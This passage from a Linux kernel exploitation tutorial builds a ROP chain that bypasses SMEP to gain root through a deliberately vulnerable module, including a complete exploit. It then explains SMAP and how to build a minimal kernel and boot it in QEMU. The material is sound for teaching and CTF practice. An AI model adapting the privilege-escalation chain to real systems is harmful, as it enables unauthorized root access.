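    uint64_t cleared = cr4 & ~(UINT64_C(1) << CR4_SMEP_BIT);
    assert((cleared & (UINT64_C(1) << CR4_SMEP_BIT)) == 0);
    return cleared;
}
```

Feeding it the 0x1006b0 from the panic gives the 0x6b0 we use in the payload.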

The last thing we need to do is find some gadgets. For this, we have to convert the bzImage file into a vmlinux ELF file so that we can run ropper or ROPgadget on it. We can do so by running extract-vmlinux, from the official Linux git repository.

$ ./extract-vmlinux bzImage > vmlinux
$ file vmlinux 
vmlinux: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=3003c277e62b32aae3cfa84bb0d5775bd2941b14, stripped

$ ropper -f vmlinux --search "pop rdi"
0xffffffff811e08ec: pop rdi; ret;

Putting it all together

All that changes in the exploit is the overflow:

// overflow
uint64_t payload[20];

int i = 6;

payload[i++] = 0xffffffff811e08ec;      // pop rdi; ret
payload[i++] = 0x6b0;
payload[i++] = 0xffffffff8102b6d0;      // native_write_cr4
payload[i++] = (uint64_t) escalate;

write(fd, payload, 0);

We can then compile it and run.

Failure

This fails. Why?

If we look at the resulting kernel panic, we meet an old friend:

[    1.542923] unable to execute userspace code (SMEP?) (uid: 0)
[    1.545224] BUG: unable to handle page fault for address: 00000000004016b9
[    1.547037] #PF: supervisor instruction fetch in kernel mode

SMEP is enabled again. How? If we debug the exploit, we definitely hit both the gadget and the call to native_write_cr4(). What gives?

Well, if we look at the source, there's another feature:

void __no_profile native_write_cr4(unsigned long val)
{
	unsigned long bits_changed = 0;

set_register:
	asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

	if (static_branch_likely(&cr_pinning)) {
		if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
			bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
			val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
			goto set_register;
		}
		/* Warn after we've corrected the changed bits. */
		WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
			  bits_changed);
	}
}

Essentially, it will check if the val that we input changes any of the bits covered by cr4_pinned_mask away from their values in cr4_pinned_bits. These values are set on boot, and effectively stop "sensitive CR bits" from being modified. If they are modified, the change is reverted by writing the pinned values back. Effectively, modifying CR4 doesn't work any longer - and hasn't since version 5.3-rc1.
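To see why our write had no lasting effect, here is a small userland model of that correction step. It is a sketch only: pinned_cr4_result is a hypothetical helper, and for the example I assume the mask covers just the SMEP bit, whereas the real mask covers several bits.

```c
#include <assert.h>
#include <stdint.h>

/* Userland model of the pinning logic in native_write_cr4(): returns the
 * value that ends up in CR4 after any pinned bits have been corrected. */
uint64_t pinned_cr4_result(uint64_t val, uint64_t pinned_mask, uint64_t pinned_bits) {
    assert((pinned_bits & ~pinned_mask) == 0);  /* pinned bits lie within the mask */
    if ((val & pinned_mask) != pinned_bits)
        val = (val & ~pinned_mask) | pinned_bits;
    return val;
}
```

With SMEP pinned, writing 0x6b0 simply ends up as 0x1006b0 again, which matches the panic we just saw.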

Kernel ROP - Privilege Escalation in Kernel Space

Bypassing SMEP by ropping through the kernel

The previous approach failed, so let's try and escalate privileges using purely ROP.

Modifying the Payload

Calling prepare_kernel_cred()

First, we have to change the ropchain. Start off with finding some useful gadgets and calling prepare_kernel_cred(0):

uint64_t pop_rdi    =  0xffffffff811e08ec;
uint64_t swapgs     =  0xffffffff8129011e;
uint64_t iretq      =  0xffffffff81022e1f;

uint64_t prepare_kernel_cred    = 0xffffffff81066fa0;
uint64_t commit_creds           = 0xffffffff81066e00;

int main() {
    // [...]

    // overflow
    uint64_t payload[25];

    int i = 6;

    // prepare_kernel_cred(0)
    payload[i++] = pop_rdi;
    payload[i++] = 0;
    payload[i++] = prepare_kernel_cred;
    
    // [...]
}

Now comes the trickiest part, which involves moving the result from RAX to RDI before calling commit_creds().

Moving RAX to RDI for commit_creds()

This requires stringing together a collection of gadgets (which took me an age to find). See if you can find them!

I ended up combining these four gadgets:

0xffffffff810dcf72: pop rdx; ret
0xffffffff811ba595: mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
0xffffffff810a2e0d: mov rdx, rcx; ret;
0xffffffff8126caee: mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;

Gadget 1 is used to set RDX to 0, so we bypass the jne in Gadget 2 and hit ret
Gadget 2 and Gadget 3 move the returned cred struct from RAX to RDX
Gadget 4 moves it from RAX to RDI, then compares RDI to RDX. We need these to be equal to bypass the jne and hit the ret

uint64_t pop_rdx                = 0xffffffff810dcf72;   // pop rdx; ret
uint64_t mov_rcx_rax            = 0xffffffff811ba595;   // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx            = 0xffffffff810a2e0d;   // mov rdx, rcx; ret;
uint64_t mov_rdi_rax            = 0xffffffff8126caee;   // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;

// [...]

// commit_creds()
payload[i++] = pop_rdx;
payload[i++] = 0;
payload[i++] = mov_rcx_rax;
payload[i++] = mov_rdx_rcx;
payload[i++] = mov_rdi_rax;
payload[i++] = commit_creds;

Returning to userland

Recall that we need swapgs and then iretq. Both can be found easily.

0xffffffff8129011e: swapgs; ret;
0xffffffff81022e1f: iretq; pop rbp; ret;

The pop rbp; ret is not important as iretq jumps away anyway.

To simulate the pushing of RIP, CS, SS, etc we just create the stack layout as it would expect - RIP|CS|RFLAGS|SP|SS, the reverse of the order they are pushed in.

// return to userland
payload[i++] = swapgs;
payload[i++] = iretq;
payload[i++] = user_rip;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_rsp;
payload[i++] = user_ss;

payload[i++] = (uint64_t) escalate;     // never reached: iretq has already jumped to user_rip

If we try this now, we successfully escalate privileges!

Final Exploit

// gcc -static -o exploit exploit.c

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>

void get_shell(void){
    puts("[*] Returned to userland");
    system("/bin/sh");
}

uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags;

uint64_t user_rip = (uint64_t) get_shell;

void save_state(){
    puts("[*] Saving state");

    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );

    puts("[+] Saved state");
}

void escalate() {
    __asm__(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"
        "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
	    "call rcx;"
        
        "mov rdi, rax;"
	    "movabs rcx, 0xffffffff81066e00;"   // commit_creds
	    "call rcx;"

        "swapgs;"
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_rsp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
    );
}

uint64_t pop_rdi    =  0xffffffff811e08ec;
uint64_t swapgs     =  0xffffffff8129011e;
uint64_t iretq      =  0xffffffff81022e1f;              // iretq; pop rbp; ret

uint64_t prepare_kernel_cred    = 0xffffffff81066fa0;
uint64_t commit_creds           = 0xffffffff81066e00;

uint64_t pop_rdx                = 0xffffffff810dcf72;   // pop rdx; ret
uint64_t mov_rcx_rax            = 0xffffffff811ba595;   // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx            = 0xffffffff810a2e0d;   // mov rdx, rcx; ret;
uint64_t mov_rdi_rax            = 0xffffffff8126caee;   // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;

int main() {
    save_state();

    // communicate with the module
    int fd = open("/dev/kernel_rop", O_RDWR);
    printf("FD: %d\n", fd);

    // overflow
    uint64_t payload[25];

    int i = 6;

    // prepare_kernel_cred(0)
    payload[i++] = pop_rdi;
    payload[i++] = 0;
    payload[i++] = prepare_kernel_cred;

    // commit_creds()
    payload[i++] = pop_rdx;
    payload[i++] = 0;
    payload[i++] = mov_rcx_rax;
    payload[i++] = mov_rdx_rcx;
    payload[i++] = mov_rdi_rax;
    payload[i++] = commit_creds;
        

    // return to userland
    payload[i++] = swapgs;
    payload[i++] = iretq;
    payload[i++] = user_rip;
    payload[i++] = user_cs;
    payload[i++] = user_rflags;
    payload[i++] = user_rsp;
    payload[i++] = user_ss;

    payload[i++] = (uint64_t) escalate;     // never reached: iretq has already jumped to user_rip

    write(fd, payload, 0);
}

SMAP

Supervisor Memory Access Protection

SMAP is a more powerful version of SMEP. Instead of only preventing code in user space from being executed, SMAP places heavy restrictions on accessing user space at all, even for accessing data. SMAP blocks the kernel from even dereferencing (i.e. accessing) data that isn't in kernel space unless it is done through a set of very specific functions.

For example, functions such as strcpy or memcpy do not work for copying data to and from user space when SMAP is enabled. Instead, we are provided the functions copy_from_user and copy_to_user, which are allowed to briefly bypass SMAP for the duration of their operation. These functions also have additional hardening against attacks such as buffer overflows, with the function __copy_overflow acting as a guard against them.

This means that whether you interact using write/read or ioctl, the structs that you pass via pointers all get copied to kernel space using these functions before they are messed around with. This also means that double-fetches are even more unlikely to occur as all operations are based on the snapshot of the data that the module took when copy_from_user was called (unless copy_from_user is called on the same struct multiple times).

Like SMEP, SMAP is controlled by the CR4 register, in this case bit 21 (SMEP is bit 20). It is also pinned, so overwriting CR4 does nothing, and instead we have to work around it. There is no specific "bypass"; the approach depends on the challenge, and SMAP simply has to be accounted for.

Enabling SMAP is just as easy as SMEP:
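As a sketch, assuming the VM is launched with QEMU as elsewhere in these notes, SMAP is usually requested through the CPU model flags. The kvm64 model shown in the comment is an assumption, not something these notes specify. The helper has_cpu_flag is a hypothetical name; it checks from inside the guest whether the flag is actually advertised:

```shell
#!/bin/sh
# Assumption: the VM is started with an explicit CPU model, for example
#   qemu-system-x86_64 -cpu kvm64,+smep,+smap ...
# Inside the guest, enabled CPU features are listed in /proc/cpuinfo.

# has_cpu_flag FLAG [FILE]
# Succeed if FLAG appears as a whole word on a "flags" line of FILE
# (FILE defaults to /proc/cpuinfo).
has_cpu_flag() {
    grep -E '^flags' "${2:-/proc/cpuinfo}" | grep -qw "$1"
}

if has_cpu_flag smap; then
    echo "SMAP advertised by the CPU"
else
    echo "SMAP not advertised"
fi
```

If the flag is missing, the guest kernel has nothing to turn on, so this is worth checking before assuming a challenge runs with SMAP.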

modprobe_path

KASLR

TODO

KPTI

Compiling, Customising and booting the Kernel

Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.

Prerequisites

$ apt-get install flex bison libelf-dev

There may be other requirements, I just already had them. Check here for the full list.

The Kernel

Cloning

git clone https://github.com/torvalds/linux --depth=1

Use --depth 1 to only get the last commit.

Customise

Remove the current compilation configuration, as it is more complex than we need:

$ cd linux
$ rm -f .config

Now we can create a minimal configuration, with almost all options disabled. A .config file is generated with the least features and drivers possible.

$ make allnoconfig
  YACC    scripts/kconfig/parser.tab.[ch]
  HOSTCC  scripts/kconfig/lexer.lex.o
  HOSTCC  scripts/kconfig/menu.o
  HOSTCC  scripts/kconfig/parser.tab.o
  HOSTCC  scripts/kconfig/preprocess.o
  HOSTCC  scripts/kconfig/symbol.o
  HOSTCC  scripts/kconfig/util.o
  HOSTLD  scripts/kconfig/conf
#
# configuration written to .config
#

We create a kconfig file with the options we want to enable. An example is the following:

CONFIG_64BIT=y
CONFIG_SMP=y
CONFIG_PRINTK=y
CONFIG_PRINTK_TIME=y

CONFIG_PCI=y

# We use an initramfs for busybox with elf binaries in it.
CONFIG_BLK_DEV_INITRD=y
CONFIG_RD_GZIP=y
CONFIG_BINFMT_ELF=y
CONFIG_BINFMT_SCRIPT=y

# This is for /dev file system.
CONFIG_DEVTMPFS=y

# For the power-down button (triggered by qemu's `system_powerdown` command).
CONFIG_INPUT=y
CONFIG_INPUT_EVDEV=y
CONFIG_INPUT_KEYBOARD=y

CONFIG_MODULES=y

CONFIG_KPROBES=n
CONFIG_LTO_NONE=y
CONFIG_SERIAL_8250=y
CONFIG_SERIAL_8250_CONSOLE=y
CONFIG_EMBEDDED=n
CONFIG_TMPFS=y

CONFIG_RELOCATABLE=y
CONFIG_RANDOMIZE_BASE=y

CONFIG_USERFAULTFD=y

Explanation of Options

CONFIG_64BIT - compiles the kernel for 64-bit
CONFIG_SMP - symmetric multiprocessing; allows the kernel to run on multiple cores
CONFIG_PRINTK, CONFIG_PRINTK_TIME - enables log messages and timestamps
CONFIG_PCI - enables support for the PCI bus
CONFIG_BLK_DEV_INITRD - enables support for loading an initial RAM disk
CONFIG_RD_GZIP - enables support for gzip-compressed initrd images
CONFIG_BINFMT_ELF - enables support for executing ELF binaries
CONFIG_BINFMT_SCRIPT - enables executing scripts with a shebang (#!) line
CONFIG_DEVTMPFS - Enables automatic creation of device nodes in /dev at boot time using devtmpfs
CONFIG_INPUT - enables support for the generic input layer required for input device handling
CONFIG_INPUT_EVDEV - enables support for the event device interface, which provides a unified input event framework
CONFIG_INPUT_KEYBOARD - enables support for keyboards
CONFIG_MODULES - enables support for loading and unloading kernel modules
CONFIG_KPROBES - disables support for kprobes, a kernel-based debugging mechanism. We disable this because ... TODO
CONFIG_LTO_NONE - disables Link Time Optimization (LTO) for kernel compilation. This is to allow better debugging
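CONFIG_SERIAL_8250, CONFIG_SERIAL_8250_CONSOLE - enables the 8250/16550 serial port driver and allows it to be used as the system console (needed for console=ttyS0 when booting in QEMU)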
CONFIG_EMBEDDED - disables optimizations/features for embedded systems
CONFIG_TMPFS - enables support for the tmpfs in-memory filesystem
CONFIG_RELOCATABLE - builds a relocatable kernel that can be loaded at different physical addresses
CONFIG_RANDOMIZE_BASE - enables KASLR support
CONFIG_USERFAULTFD - enables support for the userfaultfd system call, which allows handling of page faults in user space

In order to update the minimal .config with these options, we use the provided merge_config.sh script:

$ scripts/kconfig/merge_config.sh .config ../kconfig
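Options whose dependencies are not met get dropped from the final .config, so it can be worth checking that everything requested actually made it in. A minimal sketch, assuming the fragment lives at ../kconfig as above; missing_options is a hypothetical helper name:

```shell
#!/bin/sh
# missing_options FRAGMENT CONFIG
# Print each "CONFIG_...=y" line of FRAGMENT that is not present verbatim in CONFIG.
missing_options() {
    grep -E '^CONFIG_[A-Za-z0-9_]+=y$' "$1" | while read -r opt; do
        grep -qxF -- "$opt" "$2" || echo "$opt"
    done
}

# Example: run from the kernel source tree after merge_config.sh has finished.
if [ -f ../kconfig ] && [ -f .config ]; then
    missing_options ../kconfig .config
fi
```

No output means every =y option from the fragment is present. Any line printed names an option that was requested but did not survive the merge.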

Building

$ make -j4

That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage. This is the same bzImage that you get in CTF challenges.

Kernel Modules

When we compile kernel modules for our own kernel, we use the following Makefile structure:

all:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

To compile it for a different kernel, all we do is change the -C flag to point to the newly-compiled kernel rather than the system's:

all:
    make -C /home/ir0nstone/linux M=$(PWD) modules

The module is now compiled for the specific kernel version!

Booting the Kernel in a Virtual Machine

References

Creating the File System and Executables

We now have a minimal kernel bzImage and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.

To do this, we use busybox, an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs, in as little space as possible.

We will download and extract busybox; you can find the latest version here.

$ curl https://busybox.net/downloads/busybox-1.36.1.tar.bz2 | tar xjf -

We also create an output folder for compiled versions.

$ mkdir busybox_compiled

Now compile it statically. We're going to use the menuconfig option, so we can make some choices.

$ cd busybox-1.36.1
$ make O=../busybox_compiled menuconfig

In the menu, enable Settings -> Build static binary (no shared libs), then save and exit. Now build it with the new options:

$ cd ../busybox_compiled
$ make -j
$ make install

Now we make the file system.

$ cd ..
$ mkdir initramfs
$ cd initramfs
$ mkdir -pv {bin,dev,sbin,etc,proc,sys/kernel/debug,usr/{bin,sbin},lib,lib64,mnt/root,root}
$ cp -av ../busybox_compiled/_install/* .
$ sudo cp -av /dev/{null,console,tty,sda1} dev/

The last thing missing is the classic init script, which gets run on system load. A provisional one works fine for now:

#!/bin/sh
 
mount -t proc none /proc
mount -t sysfs none /sys
 
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
 
exec /bin/sh

Make it executable

$ chmod +x init

Finally, we're going to bundle it into a cpio archive, which is understood by QEMU.

$ find . -not -name '*.cpio' | cpio -o -H newc > initramfs.cpio

The -not -name '*.cpio' is there to prevent the archive from including itself. The pattern is quoted so that the shell passes it to find unexpanded.
You can even compress the filesystem to a .cpio.gz file, which QEMU also recognises.
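A sketch of the compressed variant, assuming cpio and gzip are installed on the host. pack_initramfs is a hypothetical helper; it writes the archive outside the tree, so no -not -name filter is needed:

```shell
#!/bin/sh
# pack_initramfs DIR OUT
# Archive the contents of DIR in newc format and gzip the result into OUT.
# OUT should be a path outside DIR so the archive cannot include itself.
pack_initramfs() {
    # The redirection is resolved before the subshell changes directory,
    # so a relative OUT is interpreted relative to the caller's directory.
    (cd "$1" && find . | cpio -o -H newc | gzip -9) > "$2"
}

# Example: pack_initramfs initramfs initramfs.cpio.gz
```

The kernel configuration above already sets CONFIG_RD_GZIP, which is what lets the kernel unpack a gzip-compressed archive at boot.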

If we want to extract the cpio archive (say, during a CTF) we can use this command:

$ cpio -i -F initramfs.cpio

Loading it with QEMU

Put bzImage and initramfs.cpio into the same folder. Write a short run.sh script that loads QEMU:

#!/bin/sh

qemu-system-x86_64 \
    -kernel bzImage \
    -initrd initramfs.cpio \
    -append "console=ttyS0 quiet loglevel=3 oops=panic" \
    -monitor /dev/null \
    -nographic \
    -no-reboot

Explanation of Flags

-kernel bzImage - sets the kernel to be our compiled bzImage
-initrd initramfs.cpio - provide the file system
-append ... - kernel command-line parameters; later on, this flag is also used to set protections
- console=ttyS0 - Direct kernel messages to the first serial port (ttyS0)
- quiet - Only show critical messages from the kernel
- loglevel=3 - Only show error messages and higher-priority messages
- oops=panic - Make the kernel panic immediately on an oops (kernel error)
-monitor /dev/null - Disable the QEMU monitor
-nographic - Disable GUI, operate in headless mode (faster)
-no-reboot - Do not automatically restart the VM when encountering a problem (useful for debugging and working out why it crashes, as the crash logs will stay).

Once we make this executable and run it, we get loaded into a VM!

User Accounts

Right now, we have a minimal Linux kernel we can boot, but if we try to work out who we are, it doesn't act quite as we expect it to:

~ # whoami
whoami: unknown uid 0

This is because /etc/passwd and /etc/group don't exist, so we can just create those!

/etc/passwd

root:x:0:0:root:/root:/bin/sh
user:x:1000:1000:User:/home/user:/bin/sh

/etc/group

root:x:0:
user:x:1000:
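One way to create both files is from the host, inside the file system tree, before repacking the archive. A minimal sketch; write_accounts is a hypothetical helper, and the directory argument is an assumption about where the tree lives:

```shell
#!/bin/sh
# write_accounts ROOT
# Create ROOT/etc/passwd and ROOT/etc/group with the root and user entries.
write_accounts() {
    mkdir -p "$1/etc"
    cat > "$1/etc/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/sh
user:x:1000:1000:User:/home/user:/bin/sh
EOF
    cat > "$1/etc/group" <<'EOF'
root:x:0:
user:x:1000:
EOF
}

# Example: write_accounts initramfs
```

The cpio archive has to be rebuilt afterwards for the new files to show up in the VM.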

Loading the Kernel Module

The final step is, of course, the loading of the kernel module. I will be using the module from my Double Fetch section for this step.

First, we copy the .ko file to the filesystem root. Then we modify the init script to load it, and also set the UID of the loaded shell to 1000 (so we are not root!).

#!/bin/sh

insmod /double_fetch.ko
mknod /dev/double_fetch c 253 0
chmod 666 /dev/double_fetch

mount -t proc none /proc
mount -t sysfs none /sys

mknod -m 666 /dev/ttyS0 c 4 64

setsid /bin/cttyhack setuidgid 1000 /bin/sh

Here I am assuming that the major number of the double_fetch module is 253.
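If the module lets the kernel pick its major number, 253 is not guaranteed. As a sketch, the init script could look the number up in /proc/devices instead. This assumes /proc is mounted before the lookup runs, that the module registers under the name double_fetch, and that the busybox build includes awk. major_of is a hypothetical helper:

```shell
#!/bin/sh
# major_of NAME [FILE]
# Print the major number listed for NAME in a /proc/devices-style file
# (FILE defaults to /proc/devices). Prints nothing if NAME is not listed.
major_of() {
    awk -v name="$1" '$2 == name { print $1; exit }' "${2:-/proc/devices}"
}

# Example for the init script, after mounting /proc and loading the module:
#   mknod /dev/double_fetch c "$(major_of double_fetch)" 0
```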

Why am I doing that?

Compiling a Different Kernel Version

If we want to compile a kernel version that is not the latest, we first fetch all the tags:

$ git fetch --tags

It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:

$ git checkout v5.11

We then continue from there.
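As an alternative sketch, a single tag can be cloned shallowly, so the full tag list never has to be fetched. This relies on git clone's --branch option, which also accepts tag names; clone_tag is a hypothetical helper and the destination directory name is just an example:

```shell
#!/bin/sh
# clone_tag URL TAG DEST
# Shallow-clone only the commit that TAG points to into DEST.
clone_tag() {
    git clone --depth 1 --branch "$2" "$1" "$3"
}

# Example: clone_tag https://github.com/torvalds/linux v5.11 linux-5.11
```

The resulting checkout is left on a detached HEAD at the tag, which is fine for building.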

Some tags seem to not have the correct header files for compilation. Others, weirdly, compile kernels that build, but then never load in QEMU. I'm not quite sure why, to be frank.